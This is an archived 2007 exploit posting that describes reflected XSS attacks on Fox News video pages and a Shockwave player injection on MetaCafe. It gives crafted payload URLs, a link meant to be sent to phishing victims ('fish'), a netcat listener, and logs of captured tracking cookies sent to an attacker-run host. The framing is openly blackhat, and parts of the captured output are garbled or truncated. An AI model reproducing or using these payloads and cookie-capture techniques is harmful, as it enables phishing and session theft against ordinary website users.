Home / os / solaris

foxnews-xss.txt

Posted on 13 November 2007

Foxnews 0day XSS Shock Attack <http://www.foxnews.com/video2/launchPage.html?100207/100207_imag_PETITE&%253Ch1%253E%253Ca%2520href=//xssworm.com%253EXSS%2520Worm%2520Web%25202.0%2520Security%2520Portal%253C/a%253E%253Cbr%253E%253C/h1%253EWith%2520new%25200day%2520Fox%2520News%2520XSS%2520Hacking%2520Video!> Demo link to send to a fish: http://www.foxnews.com/video2/launchPage.html?http://localhost/ With netcat listen on localhost : listening on [any] 80 ... connect to localhost [127.0.0.1] from localhost [127.0.0.1] 1964 GET /E05510/a3/0/3/1380/1/0/116282DDC64/0/0/00000000/312340660.gif?D=DM%5FLOC%3D http%3A%2F%2Fwww%252Efoxnews%252Ecom%2Fvideo2%2FlaunchPage%252Ehtml%253Fhttp%3A% 2F%2Flocalhost%2526pageType%253Dmisc%2526miscPage%253DVideo%252520Launch%252520P age%26DM%5FREF%3D%26DM%5FTIT%3DFOXNews%252Ecom%20%2D%20Video%20Launch%20Page%20% 2D%20FOXNews%252Ecom%26DM%5FEOM%3D1 HTTP/1.1 Host: pix01.revsci.net User-Agent: Mozilla/5.0 (Mandriver) Accept: image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://www.foxnews.com/video2/launchPage.html?http://localhost *Cookie: NETID01=9mWO-Ar@1RoAAAm1AWEAAAC5; NETSEGS_J05532=960C7930BE970CE4&J05532 &3F149836&472757D9&0&&4723FE85&C2C6A1738F3B885FCA46DE74CFF355ED* I think maybe this is to make many shock waves with XSS ! Zero Day Shockwave SWF Player Exploit with XSS Attack<http://xssworm.blogvis.com/12/xssworm/zero-day-shockwave-swf-player-exploit-with-xss-attack/> in the hacking metacafe we discover Shockwave XSS 0day attack to use by blackhat to steal fish: MetaCafe XSS Worm Vulnerabilities - ZeroDay Shockwave Attack POC - : http://www.metacafe.com/f/fvp/EmbedVideoPlayer_5.1.0.0.swf?itemID=755028&mediaURL=http://xssworm.com/?fish&normalizedTitle=space_trip&isViral=false&isWatermarked=false&postrollContentURL=http://l3images.metacafe.com/f/fvp/EmbedItemSelector_3.0.0.5.swf&networkingAllowed=true & We see this outputs in xssworm.com log - : GET /crossdomain.xml HTTP/1.1 Host: metacafe.122.2o7.net Cookie: s_vi_xxhybx7BxBxxclx7Fx7D=[CS]v4|472A0D2D00060B2-290B2900004DB|472A0 D2D[CE]; s_vihfex7Ekx7Dx7Fzxx=[CS]v4|47208A0C00004D74-A170C5400003A87|472DA4DB[ CE]; s_vi_jdghjlgdijg=[CS]v4|472605E00007606-A170BAE0000639DC|4726056DCE] s_vi _wzvqcdsx7F7×60qx7isx7Fx7D[CS]v4|..... snips

 

TOP